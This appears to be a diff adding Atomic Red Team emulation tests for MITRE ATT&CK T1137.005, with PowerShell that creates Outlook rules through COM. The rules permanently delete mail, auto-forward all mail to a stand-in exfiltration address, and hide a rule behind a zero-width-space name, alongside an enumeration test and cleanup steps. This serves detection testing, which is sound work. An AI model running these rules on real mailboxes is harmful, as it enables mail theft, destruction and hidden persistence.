+        session. Outlook COM fails with 0x80080005 when invoked as Administrator.
+      supported_platforms:
+      - windows
+      input_arguments:
+        rule_name:
+          description: Name for the forwarding rule
+          type: string
+          default: AtomicTest_T1137005_ForwardExfil
+        forward_to_address:
+          description: Email address to forward mail to (use a controlled test address)
+          type: string
+          default: atomictest-exfil@redteam.local
+      dependencies:
+      - description: Classic Outlook must be installed (required for COM automation)
+        prereq_command: |
+          $clsid = (Get-ItemProperty "REGISTRY::HKEY_CLASSES_ROOT\Outlook.Application\CLSID" -ErrorAction SilentlyContinue).'(Default)'
+          if ($clsid) { exit 0 } else { exit 1 }
+        get_prereq_command: |
+          Write-Host "[-] Classic Outlook is not installed or COM is not registered."
+          Write-Host "    Install Microsoft 365 Apps with Classic Outlook before running this test."
+          Write-Host "    Note: The new Outlook for Windows does NOT support COM automation."
+          exit 1
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+          if ($isAdmin) {
+              Write-Host "[-] This test must be run from a non-elevated PowerShell session."
+              Write-Host "    Outlook COM fails with 0x80080005 when run as Administrator."
+              exit 1
+          }
+
+          $outlook   = New-Object -ComObject Outlook.Application
+          $namespace = $outlook.GetNamespace("MAPI")
+          $rules     = $namespace.DefaultStore.GetRules()
+          $rule      = $rules.Create("#{rule_name}", 0)
+
+          $action = $rule.Actions.Forward
+          $action.Enabled = $true
+          $action.Recipients.Add("#{forward_to_address}")
+          $action.Recipients.ResolveAll() | Out-Null
+
+          $rule.Enabled = $true
+          $rules.Save()
+          Write-Host "[+] Auto-forward rule '#{rule_name}' created -> #{forward_to_address}"
+          Write-Host "[!] Run cleanup immediately after verifying rule creation in Outlook."
+        cleanup_command: |
+          $isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+          if ($isAdmin) {
+              Write-Host "[-] Cleanup must be run from a non-elevated PowerShell session. Skipping."
+              exit 1
+          }
+          $outlook   = New-Object -ComObject Outlook.Application
+          $namespace = $outlook.GetNamespace("MAPI")
+          $rules     = $namespace.DefaultStore.GetRules()
+          $removed   = $false
+          for ($i = $rules.Count; $i -ge 1; $i--) {
+              if ($rules.Item($i).Name -eq "#{rule_name}") {
+                  $rules.Remove($rules.Item($i).Name)
+                  $removed = $true
+              }
+          }
+          if ($removed) {
+              $rules.Save()
+              Write-Host "[+] All instances of forwarding rule '#{rule_name}' removed."
+          } else {
+              Write-Host "[*] Rule '#{rule_name}' not found - already removed."
+          }
+    - name: Outlook Rules - Enumerate Existing Rules via PowerShell COM Object
+      auto_generated_guid: 5ff5249a-5807-480e-ab52-c430497a8a25
+      description: |
+        Enumerates all Outlook rules configured on the local profile using the
+        PowerShell COM object. Simulates the discovery phase where an adversary
+        audits existing rules before implanting their own, or where a threat actor
+        tool such as Ruler lists rules to understand the environment. This
+        enumeration should itself generate telemetry - use it to validate that
+        your monitoring catches PowerShell spawning Outlook COM for recon purposes.
+        NOTE: This test MUST be run from a non-elevated (standard user) PowerShell
+        session. Outlook COM fails with 0x80080005 when invoked as Administrator.
+      supported_platforms:
+      - windows
+      dependencies:
+      - description: Classic Outlook must be installed (required for COM automation)
+        prereq_command: |
+          $clsid = (Get-ItemProperty "REGISTRY::HKEY_CLASSES_ROOT\Outlook.Application\CLSID" -ErrorAction SilentlyContinue).'(Default)'
+          if ($clsid) { exit 0 } else { exit 1 }
+        get_prereq_command: |
+          Write-Host "[-] Classic Outlook is not installed or COM is not registered."
+          Write-Host "    Install Microsoft 365 Apps with Classic Outlook before running this test."
+          Write-Host "    Note: The new Outlook for Windows does NOT support COM automation."
+          exit 1
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+          if ($isAdmin) {
+              Write-Host "[-] This test must be run from a non-elevated PowerShell session."
+              Write-Host "    Outlook COM fails with 0x80080005 when run as Administrator."
+              exit 1
+          }
+
+          $outlook = New-Object -ComObject Outlook.Application
+          $rules   = $outlook.GetNamespace("MAPI").DefaultStore.GetRules()
+
+          Write-Host "`n[*] Enumerating Outlook rules on local profile..."
+          Write-Host "    Total rules found: $($rules.Count)`n"
+
+          for ($i = 1; $i -le $rules.Count; $i++) {
+              $r = $rules.Item($i)
+              Write-Host "  Rule $i : Name='$($r.Name)' | Enabled=$($r.Enabled)"
+          }
+
+          if ($rules.Count -eq 0) {
+              Write-Host "  (No rules configured)"
+          }
+        cleanup_command: 'Write-Host "[*] No cleanup required for enumeration test."
+
+          '
+    - name: Outlook Rule - Create Rule with Obfuscated Blank Name (MAPI Evasion)
+      auto_generated_guid: cb814cf8-24f2-41dc-a1cd-1c2073276d4a
+      description: |
+        Creates an Outlook rule with a zero-width space as its display name,
+        making it appear blank and invisible in the standard Outlook Rules UI.
+        Simulates the hidden inbox rule technique documented by Damian Pfammatter
+        (2018) and referenced in MITRE ATT&CK T1137.005 - adversaries use MAPI
+        editors or Ruler to blank PR_RULE_MSG_NAME so the rule does not appear
+        during casual rule auditing. Tests whether monitoring catches rules that
+        are invisible in the Outlook GUI but detectable via MFCMapi or
+        Get-InboxRule on Exchange. Uses PlaySound action as RunApplication
+        cannot be created programmatically per Microsoft's Rules object model.
+        NOTE: This test MUST be run from a non-elevated (standard user) PowerShell
+        session. Outlook COM fails with 0x80080005 when invoked as Administrator.
+        NOTE: Script is written to a temp file before execution to prevent the
+        ART executor's quote-wrapping from mangling the zero-width space bytes.
+      supported_platforms:
+      - windows
+      input_arguments:
+        trigger_subject:
+          description: Subject keyword to trigger the hidden rule
+          type: string
+          default: atomic-rt-hidden
+        sound_file_path:
+          description: Path to .wav file used as the rule action payload indicator
+          type: string
+          default: C:\Windows\Media\notify.wav
+      dependencies:
+      - description: Classic Outlook must be installed (required for COM automation)
+        prereq_command: |
+          $clsid = (Get-ItemProperty "REGISTRY::HKEY_CLASSES_ROOT\Outlook.Application\CLSID" -ErrorAction SilentlyContinue).'(Default)'
+          if ($clsid) { exit 0 } else { exit 1 }
+        get_prereq_command: |
+          Write-Host "[-] Classic Outlook is not installed or COM is not registered."
+          Write-Host "    Install Microsoft 365 Apps with Classic Outlook before running this test."
+          Write-Host "    Note: The new Outlook for Windows does NOT support COM automation."
+          exit 1
+      - description: Sound file must exist for PlaySound action
+        prereq_command: 'if (Test-Path "#{sound_file_path}") { exit 0 } else { exit
+          1 }
+
+          '
+        get_prereq_command: |
+          Write-Host "[-] Sound file not found at #{sound_file_path}"
+          Write-Host "    Specify a valid .wav file path in the sound_file_path input argument."
+          exit 1
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+          if ($isAdmin) {
+              Write-Host "[-] This test must be run from a non-elevated PowerShell session."
+              Write-Host "    Outlook COM fails with 0x80080005 when run as Administrator."
+              exit 1
+          }
+          $tmpScript = "$env:TEMP\T1137005_hidden_rule_create.ps1"
+          $lines = @(
+              '$hiddenName = [System.Text.Encoding]::Unicode.GetString([byte[]](0x0B, 0x20))',
+              '$outlook   = New-Object -ComObject Outlook.Application',
+              '$namespace = $outlook.GetNamespace("MAPI")',
+              '$rules     = $namespace.DefaultStore.GetRules()',
+              '$rule      = $rules.Create($hiddenName, 0)',
+              '$cond = $rule.Conditions.Subject',
+              '$cond.Enabled = $true',
+              '$cond.Text    = @("#{trigger_subject}")',
+              '$action          = $rule.Actions.PlaySound',
+              '$action.Enabled  = $true',
+              '$action.FilePath = "#{sound_file_path}"',
+              '$rule.Enabled = $true',
+              '$rules.Save()',
+              'Write-Host "[+] Hidden rule created with zero-width space name."',
+              'Write-Host "[*] Open Outlook via File -> Manage Rules and Alerts - rule name will appear blank."',
+              'Write-Host "[*] Verify rule exists via PowerShell COM enumeration (Test 4) or Get-InboxRule in Exchange."'
+          )
+          $lines -join "`n" | Set-Content -Path $tmpScript -Encoding UTF8
+          powershell.exe -NoProfile -ExecutionPolicy Bypass -File $tmpScript
+          Remove-Item $tmpScript -ErrorAction SilentlyContinue
+        cleanup_command: |
+          $isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+          if ($isAdmin) {
+              Write-Host "[-] Cleanup must be run from a non-elevated PowerShell session. Skipping."
+              exit 1
+          }
+          $tmpScript = "$env:TEMP\T1137005_hidden_rule_cleanup.ps1"
+          $lines = @(
+              '$hiddenName = [System.Text.Encoding]::Unicode.GetString([byte[]](0x0B, 0x20))',
+              '$outlook    = New-Object -ComObject Outlook.Application',
+              '$namespace  = $outlook.GetNamespace("MAPI")',
+              '$rules      = $namespace.DefaultStore.GetRules()',
+              '$removed    = $false',
+              'for ($i = $rules.Count; $i -ge 1; $i--) {',
+              '    if ($rules.Item($i).Name -eq $hiddenName) {',
+              '        $rules.Remove($rules.Item($i).Name)',
+              '        $removed = $true',
+              '    }',
+              '}',
+              'if ($removed) {',
+              '    $rules.Save()',
+              '    Write-Host "[+] Hidden rule(s) removed."',
+              '} else {',
+              '    Write-Host "[-] Hidden rule not found - may have already been removed."',
+              '}'
+          )
+          $lines -join "`n" | Set-Content -Path $tmpScript -Encoding UTF8
+          powershell.exe -NoProfile -ExecutionPolicy Bypass -File $tmpScript
+          Remove-Item $tmpScript -ErrorAction SilentlyContinue
  T1098.007:
    technique:
      type: attack-pattern
@@ -0,0 +1,502 @@
+# T1137.005 - Office Application Startup: Outlook Rules
+
+## Description from ATT&CK
+
+> Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
+> 
+> Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)
+
+[Source](https://attack.mitre.org/techniques/T1137/005)
+
+## Atomic Tests
+
+- [Atomic Test #1: Outlook Rule - Subject Trigger with DeletePermanently Action via COM Object](#atomic-test-1-outlook-rule---subject-trigger-with-deletepermanently-action-via-com-object)
+- [Atomic Test #2: Outlook Rule - Sender Address Trigger with DeletePermanently Action via COM Object](#atomic-test-2-outlook-rule---sender-address-trigger-with-deletepermanently-action-via-com-object)
+- [Atomic Test #3: Outlook Rule - Auto-Forward Emails to External Address via COM Object](#atomic-test-3-outlook-rule---auto-forward-emails-to-external-address-via-com-object)
+- [Atomic Test #4: Outlook Rules - Enumerate Existing Rules via PowerShell COM Object](#atomic-test-4-outlook-rules---enumerate-existing-rules-via-powershell-com-object)
+- [Atomic Test #5: Outlook Rule - Create Rule with Obfuscated Blank Name (MAPI Evasion)](#atomic-test-5-outlook-rule---create-rule-with-obfuscated-blank-name-mapi-evasion)
+
+### Atomic Test #1: Outlook Rule - Subject Trigger with DeletePermanently Action via COM Object
+
+Creates a malicious Outlook rule via the COM object that permanently deletes
+emails when an email with a specific subject keyword arrives. Simulates
+adversary persistence via Outlook Rules (T1137.005). Uses DeletePermanently
+action as it does not require a resolved Exchange folder unlike MoveToFolder.
+NOTE: olRuleActionStartApplication cannot be created programmatically per
+Microsoft's Rules object model - DeletePermanently is used as the supported
+equivalent that generates the same rule-creation artefact.
+NOTE: This test MUST be run from a non-elevated (standard user) PowerShell
+session. Outlook COM fails with 0x80080005 when invoked as Administrator.
+
+**Supported Platforms:** Windows
+
+**auto_generated_guid:** `ffadc988-b682-4a68-bd7e-4803666be637`
+
+#### Inputs
+
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| rule_name | Name for the malicious Outlook rule | string | AtomicTest_T1137005_SubjectTrigger|
+| trigger_subject | Email subject keyword that triggers the rule | string | atomic-rt-trigger|
+
+#### Attack Commands: Run with `powershell`!
+
+```powershell
+$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+if ($isAdmin) {
+    Write-Host "[-] This test must be run from a non-elevated PowerShell session."
+    Write-Host "    Outlook COM fails with 0x80080005 when run as Administrator."
+    exit 1
+}
+
+$outlook   = New-Object -ComObject Outlook.Application
+$namespace = $outlook.GetNamespace("MAPI")
+$rules     = $namespace.DefaultStore.GetRules()
+$rule      = $rules.Create("#{rule_name}", 0)
+
+$cond = $rule.Conditions.Subject
+$cond.Enabled = $true
+$cond.Text    = @("#{trigger_subject}")
+
+$action         = $rule.Actions.DeletePermanently
+$action.Enabled = $true
+
+$rule.Enabled = $true
+$rules.Save()
+Write-Host "[+] Rule '#{rule_name}' created. Emails with subject '#{trigger_subject}' will be permanently deleted."
+```
+
+#### Cleanup Commands
+
+```powershell
+$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+if ($isAdmin) {
+    Write-Host "[-] Cleanup must be run from a non-elevated PowerShell session. Skipping."
+    exit 1
+}
+$outlook   = New-Object -ComObject Outlook.Application
+$namespace = $outlook.GetNamespace("MAPI")
+$rules     = $namespace.DefaultStore.GetRules()
+$removed   = $false
+for ($i = $rules.Count; $i -ge 1; $i--) {
+    if ($rules.Item($i).Name -eq "#{rule_name}") {
+        $rules.Remove($rules.Item($i).Name)
+        $removed = $true
+    }
+}
+if ($removed) {
+    $rules.Save()
+    Write-Host "[+] All instances of rule '#{rule_name}' removed."
+} else {
+    Write-Host "[*] Rule '#{rule_name}' not found - already removed."
+}
+```
+
+#### Dependencies: Run with `powershell`!
+
+##### Description: Classic Outlook must be installed (required for COM automation)
+
+###### Check Prereq Commands
+
+```powershell
+$clsid = (Get-ItemProperty "REGISTRY::HKEY_CLASSES_ROOT\Outlook.Application\CLSID" -ErrorAction SilentlyContinue).'(Default)'
+if ($clsid) { exit 0 } else { exit 1 }
+```
+
+###### Get Prereq Commands
+
+```powershell
+Write-Host "[-] Classic Outlook is not installed or COM is not registered."
+Write-Host "    Install Microsoft 365 Apps with Classic Outlook before running this test."
+Write-Host "    Note: The new Outlook for Windows does NOT support COM automation."
+exit 1
+```
+
+### Atomic Test #2: Outlook Rule - Sender Address Trigger with DeletePermanently Action via COM Object
+
+Creates an Outlook rule via COM that permanently deletes emails received
+from a specific sender address. Adversaries use sender-based triggers to
+make rules appear more legitimate (e.g. disguised as a filter for a
+specific colleague). Tests a different rule condition path through the
+COM object model. Uses DeletePermanently as it does not require a resolved
+Exchange folder unlike MoveToFolder.
+NOTE: This test MUST be run from a non-elevated (standard user) PowerShell
+session. Outlook COM fails with 0x80080005 when invoked as Administrator.
+
+**Supported Platforms:** Windows
+
+**auto_generated_guid:** `bddfd8d4-7687-4971-b611-50a537ab3ab4`
+
+#### Inputs
+
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| rule_name | Name for the malicious Outlook rule | string | AtomicTest_T1137005_SenderTrigger|
+| trigger_sender | Sender email address that triggers the rule | string | atomictest@redteam.local|
+
+#### Attack Commands: Run with `powershell`!
+
+```powershell
+$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+if ($isAdmin) {
+    Write-Host "[-] This test must be run from a non-elevated PowerShell session."
+    Write-Host "    Outlook COM fails with 0x80080005 when run as Administrator."
+    exit 1
+}
+
+$outlook   = New-Object -ComObject Outlook.Application
+$namespace = $outlook.GetNamespace("MAPI")
+$rules     = $namespace.DefaultStore.GetRules()
+$rule      = $rules.Create("#{rule_name}", 0)
+
+$cond = $rule.Conditions.From
+$cond.Enabled = $true
+$cond.Recipients.Add("#{trigger_sender}")
+$cond.Recipients.ResolveAll() | Out-Null
+
+$action         = $rule.Actions.DeletePermanently
+$action.Enabled = $true
+
+$rule.Enabled = $true
+$rules.Save()
+Write-Host "[+] Sender-based rule '#{rule_name}' created. Emails from '#{trigger_sender}' will be permanently deleted."
+```
+
+#### Cleanup Commands
+
+```powershell
+$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+if ($isAdmin) {
+    Write-Host "[-] Cleanup must be run from a non-elevated PowerShell session. Skipping."
+    exit 1
+}
+$outlook   = New-Object -ComObject Outlook.Application
+$namespace = $outlook.GetNamespace("MAPI")
+$rules     = $namespace.DefaultStore.GetRules()
+$removed   = $false
+for ($i = $rules.Count; $i -ge 1; $i--) {
+    if ($rules.Item($i).Name -eq "#{rule_name}") {
+        $rules.Remove($rules.Item($i).Name)
+        $removed = $true
+    }
+}
+if ($removed) {
+    $rules.Save()
+    Write-Host "[+] All instances of rule '#{rule_name}' removed."
+} else {
+    Write-Host "[*] Rule '#{rule_name}' not found - already removed."
+}
+```
+
+#### Dependencies: Run with `powershell`!
+
+##### Description: Classic Outlook must be installed (required for COM automation)
+
+###### Check Prereq Commands
+
+```powershell
+$clsid = (Get-ItemProperty "REGISTRY::HKEY_CLASSES_ROOT\Outlook.Application\CLSID" -ErrorAction SilentlyContinue).'(Default)'
+if ($clsid) { exit 0 } else { exit 1 }
+```
+
+###### Get Prereq Commands
+
+```powershell
+Write-Host "[-] Classic Outlook is not installed or COM is not registered."
+Write-Host "    Install Microsoft 365 Apps with Classic Outlook before running this test."
+Write-Host "    Note: The new Outlook for Windows does NOT support COM automation."
+exit 1
+```
+
+### Atomic Test #3: Outlook Rule - Auto-Forward Emails to External Address via COM Object
+
+Creates an Outlook rule that automatically forwards all received emails to
+an external address. Simulates Business Email Compromise (BEC) and insider
+threat scenarios where adversaries establish forwarding rules to exfiltrate
+mail. One of the most commonly observed real-world abuses of Outlook rules.
+Detected by Exchange mail flow anomalies and Microsoft Secure Score
+forwarding alerts.
+NOTE: No actual email is forwarded during this test - the rule is created
+but a trigger email is not sent. Run cleanup immediately after verification.
+NOTE: This test MUST be run from a non-elevated (standard user) PowerShell
+session. Outlook COM fails with 0x80080005 when invoked as Administrator.
+
+**Supported Platforms:** Windows
+
+**auto_generated_guid:** `b0bd3d76-a57c-4699-83f4-8cd798dd09bd`
+
+#### Inputs
+
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| rule_name | Name for the forwarding rule | string | AtomicTest_T1137005_ForwardExfil|
+| forward_to_address | Email address to forward mail to (use a controlled test address) | string | atomictest-exfil@redteam.local|
+
+#### Attack Commands: Run with `powershell`!
+
+```powershell
+$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+if ($isAdmin) {
+    Write-Host "[-] This test must be run from a non-elevated PowerShell session."
+    Write-Host "    Outlook COM fails with 0x80080005 when run as Administrator."
+    exit 1
+}
+
+$outlook   = New-Object -ComObject Outlook.Application
+$namespace = $outlook.GetNamespace("MAPI")
+$rules     = $namespace.DefaultStore.GetRules()
+$rule      = $rules.Create("#{rule_name}", 0)
+
+$action = $rule.Actions.Forward
+$action.Enabled = $true
+$action.Recipients.Add("#{forward_to_address}")
+$action.Recipients.ResolveAll() | Out-Null
+
+$rule.Enabled = $true
+$rules.Save()
+Write-Host "[+] Auto-forward rule '#{rule_name}' created -> #{forward_to_address}"
+Write-Host "[!] Run cleanup immediately after verifying rule creation in Outlook."
+```
+
+#### Cleanup Commands
+
+```powershell
+$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+if ($isAdmin) {
+    Write-Host "[-] Cleanup must be run from a non-elevated PowerShell session. Skipping."
+    exit 1
+}
+$outlook   = New-Object -ComObject Outlook.Application
+$namespace = $outlook.GetNamespace("MAPI")
+$rules     = $namespace.DefaultStore.GetRules()
+$removed   = $false
+for ($i = $rules.Count; $i -ge 1; $i--) {
+    if ($rules.Item($i).Name -eq "#{rule_name}") {
+        $rules.Remove($rules.Item($i).Name)
+        $removed = $true
+    }
+}
+if ($removed) {
+    $rules.Save()
+    Write-Host "[+] All instances of forwarding rule '#{rule_name}' removed."
+} else {
+    Write-Host "[*] Rule '#{rule_name}' not found - already removed."
+}
+```
+
+#### Dependencies: Run with `powershell`!
+
+##### Description: Classic Outlook must be installed (required for COM automation)
+
+###### Check Prereq Commands
+
+```powershell
+$clsid = (Get-ItemProperty "REGISTRY::HKEY_CLASSES_ROOT\Outlook.Application\CLSID" -ErrorAction SilentlyContinue).'(Default)'
+if ($clsid) { exit 0 } else { exit 1 }
+```
+
+###### Get Prereq Commands
+
+```powershell
+Write-Host "[-] Classic Outlook is not installed or COM is not registered."
+Write-Host "    Install Microsoft 365 Apps with Classic Outlook before running this test."
+Write-Host "    Note: The new Outlook for Windows does NOT support COM automation."
+exit 1
+```
+
+### Atomic Test #4: Outlook Rules - Enumerate Existing Rules via PowerShell COM Object
+
+Enumerates all Outlook rules configured on the local profile using the
+PowerShell COM object. Simulates the discovery phase where an adversary
+audits existing rules before implanting their own, or where a threat actor
+tool such as Ruler lists rules to understand the environment. This
+enumeration should itself generate telemetry - use it to validate that
+your monitoring catches PowerShell spawning Outlook COM for recon purposes.
+NOTE: This test MUST be run from a non-elevated (standard user) PowerShell
+session. Outlook COM fails with 0x80080005 when invoked as Administrator.
+
+**Supported Platforms:** Windows
+
+**auto_generated_guid:** `5ff5249a-5807-480e-ab52-c430497a8a25`
+
+#### Attack Commands: Run with `powershell`!
+
+```powershell
+$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+if ($isAdmin) {
+    Write-Host "[-] This test must be run from a non-elevated PowerShell session."
+    Write-Host "    Outlook COM fails with 0x80080005 when run as Administrator."
+    exit 1
+}
+
+$outlook = New-Object -ComObject Outlook.Application
+$rules   = $outlook.GetNamespace("MAPI").DefaultStore.GetRules()
+
+Write-Host "`n[*] Enumerating Outlook rules on local profile..."
+Write-Host "    Total rules found: $($rules.Count)`n"
+
+for ($i = 1; $i -le $rules.Count; $i++) {
+    $r = $rules.Item($i)
+    Write-Host "  Rule $i : Name='$($r.Name)' | Enabled=$($r.Enabled)"
+}
+
+if ($rules.Count -eq 0) {
+    Write-Host "  (No rules configured)"
+}
+```
+
+#### Cleanup Commands
+
+```powershell
+Write-Host "[*] No cleanup required for enumeration test."
+```
+
+#### Dependencies: Run with `powershell`!
+
+##### Description: Classic Outlook must be installed (required for COM automation)
+
+###### Check Prereq Commands
+
+```powershell
+$clsid = (Get-ItemProperty "REGISTRY::HKEY_CLASSES_ROOT\Outlook.Application\CLSID" -ErrorAction SilentlyContinue).'(Default)'
+if ($clsid) { exit 0 } else { exit 1 }
+```
+
+###### Get Prereq Commands
+
+```powershell
+Write-Host "[-] Classic Outlook is not installed or COM is not registered."
+Write-Host "    Install Microsoft 365 Apps with Classic Outlook before running this test."
+Write-Host "    Note: The new Outlook for Windows does NOT support COM automation."
+exit 1
+```
+
+### Atomic Test #5: Outlook Rule - Create Rule with Obfuscated Blank Name (MAPI Evasion)
+
+Creates an Outlook rule with a zero-width space as its display name,
+making it appear blank and invisible in the standard Outlook Rules UI.
+Simulates the hidden inbox rule technique documented by Damian Pfammatter
+(2018) and referenced in MITRE ATT&CK T1137.005 - adversaries use MAPI
+editors or Ruler to blank PR_RULE_MSG_NAME so the rule does not appear
+during casual rule auditing. Tests whether monitoring catches rules that
+are invisible in the Outlook GUI but detectable via MFCMapi or
+Get-InboxRule on Exchange. Uses PlaySound action as RunApplication
+cannot be created programmatically per Microsoft's Rules object model.
+NOTE: This test MUST be run from a non-elevated (standard user) PowerShell
+session. Outlook COM fails with 0x80080005 when invoked as Administrator.
+NOTE: Script is written to a temp file before execution to prevent the
+ART executor's quote-wrapping from mangling the zero-width space bytes.
+
+**Supported Platforms:** Windows
+
+**auto_generated_guid:** `cb814cf8-24f2-41dc-a1cd-1c2073276d4a`
+
+#### Inputs
+
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| trigger_subject | Subject keyword to trigger the hidden rule | string | atomic-rt-hidden|
+| sound_file_path | Path to .wav file used as the rule action payload indicator | string | C:&#92;Windows&#92;Media&#92;notify.wav|
+
+#### Attack Commands: Run with `powershell`!
+
+```powershell
+$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+if ($isAdmin) {
+    Write-Host "[-] This test must be run from a non-elevated PowerShell session."
+    Write-Host "    Outlook COM fails with 0x80080005 when run as Administrator."
+    exit 1
+}
+$tmpScript = "$env:TEMP\T1137005_hidden_rule_create.ps1"
+$lines = @(
+    '$hiddenName = [System.Text.Encoding]::Unicode.GetString([byte[]](0x0B, 0x20))',
+    '$outlook   = New-Object -ComObject Outlook.Application',
+    '$namespace = $outlook.GetNamespace("MAPI")',
+    '$rules     = $namespace.DefaultStore.GetRules()',
+    '$rule      = $rules.Create($hiddenName, 0)',
+    '$cond = $rule.Conditions.Subject',
+    '$cond.Enabled = $true',
+    '$cond.Text    = @("#{trigger_subject}")',
+    '$action          = $rule.Actions.PlaySound',
+    '$action.Enabled  = $true',
+    '$action.FilePath = "#{sound_file_path}"',
+    '$rule.Enabled = $true',
+    '$rules.Save()',
+    'Write-Host "[+] Hidden rule created with zero-width space name."',
+    'Write-Host "[*] Open Outlook via File -> Manage Rules and Alerts - rule name will appear blank."',
+    'Write-Host "[*] Verify rule exists via PowerShell COM enumeration (Test 4) or Get-InboxRule in Exchange."'
+)
+$lines -join "`n" | Set-Content -Path $tmpScript -Encoding UTF8
+powershell.exe -NoProfile -ExecutionPolicy Bypass -File $tmpScript
+Remove-Item $tmpScript -ErrorAction SilentlyContinue
+```
+
+#### Cleanup Commands
+
+```powershell
+$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+if ($isAdmin) {
+    Write-Host "[-] Cleanup must be run from a non-elevated PowerShell session. Skipping."
+    exit 1
+}
+$tmpScript = "$env:TEMP\T1137005_hidden_rule_cleanup.ps1"
+$lines = @(
+    '$hiddenName = [System.Text.Encoding]::Unicode.GetString([byte[]](0x0B, 0x20))',
+    '$outlook    = New-Object -ComObject Outlook.Application',
+    '$namespace  = $outlook.GetNamespace("MAPI")',
+    '$rules      = $namespace.DefaultStore.GetRules()',
+    '$removed    = $false',
+    'for ($i = $rules.Count; $i -ge 1; $i--) {',
+    '    if ($rules.Item($i).Name -eq $hiddenName) {',
+    '        $rules.Remove($rules.Item($i).Name)',
+    '        $removed = $true',
+    '    }',
+    '}',
+    'if ($removed) {',
+    '    $rules.Save()',
+    '    Write-Host "[+] Hidden rule(s) removed."',
+    '} else {',
+    '    Write-Host "[-] Hidden rule not found - may have already been removed."',
+    '}'
+)
+$lines -join "`n" | Set-Content -Path $tmpScript -Encoding UTF8
+powershell.exe -NoProfile -ExecutionPolicy Bypass -File $tmpScript
+Remove-Item $tmpScript -ErrorAction SilentlyContinue
+```
+
+#### Dependencies: Run with `powershell`!
+
+##### Description: Classic Outlook must be installed (required for COM automation)
+
+###### Check Prereq Commands
+
+```powershell
+$clsid = (Get-ItemProperty "REGISTRY::HKEY_CLASSES_ROOT\Outlook.Application\CLSID" -ErrorAction SilentlyContinue).'(Default)'
+if ($clsid) { exit 0 } else { exit 1 }
+```
+
+###### Get Prereq Commands
+
+```powershell
+Write-Host "[-] Classic Outlook is not installed or COM is not registered."
+Write-Host "    Install Microsoft 365 Apps with Classic Outlook before running this test."
+Write-Host "    Note: The new Outlook for Windows does NOT support COM automation."
+exit 1
+```
+
+##### Description: Sound file must exist for PlaySound action
+
+###### Check Prereq Commands
+
+```powershell
+if (Test-Path "#{sound_file_path}") { exit 0 } else { exit 1 }
+```
+
+###### Get Prereq Commands
+
+```powershell
+Write-Host "[-] Sound file not found at #{sound_file_path}"
+Write-Host "    Specify a valid .wav file path in the sound_file_path input argument."
+exit 1
+```
+
@@ -7,7 +7,7 @@ atomic_tests:
 # TEST 1 — COM Object: Rule Triggers on Subject Keyword
 # ============================================================
 - name: Outlook Rule - Subject Trigger with DeletePermanently Action via COM Object
-  auto_generated_guid:
+  auto_generated_guid: ffadc988-b682-4a68-bd7e-4803666be637
  description: |
    Creates a malicious Outlook rule via the COM object that permanently deletes
    emails when an email with a specific subject keyword arrives. Simulates
@@ -93,7 +93,7 @@ atomic_tests:
 # TEST 2 — COM Object: Rule Triggers on Sender Address
 # ============================================================
 - name: Outlook Rule - Sender Address Trigger with DeletePermanently Action via COM Object
-  auto_generated_guid:
+  auto_generated_guid: bddfd8d4-7687-4971-b611-50a537ab3ab4
  description: |
    Creates an Outlook rule via COM that permanently deletes emails received
    from a specific sender address. Adversaries use sender-based triggers to
@@ -179,7 +179,7 @@ atomic_tests:
 # TEST 3 — COM Object: Auto-Forward Rule (Exfiltration)
 # ============================================================
 - name: Outlook Rule - Auto-Forward Emails to External Address via COM Object
-  auto_generated_guid:
+  auto_generated_guid: b0bd3d76-a57c-4699-83f4-8cd798dd09bd
  description: |
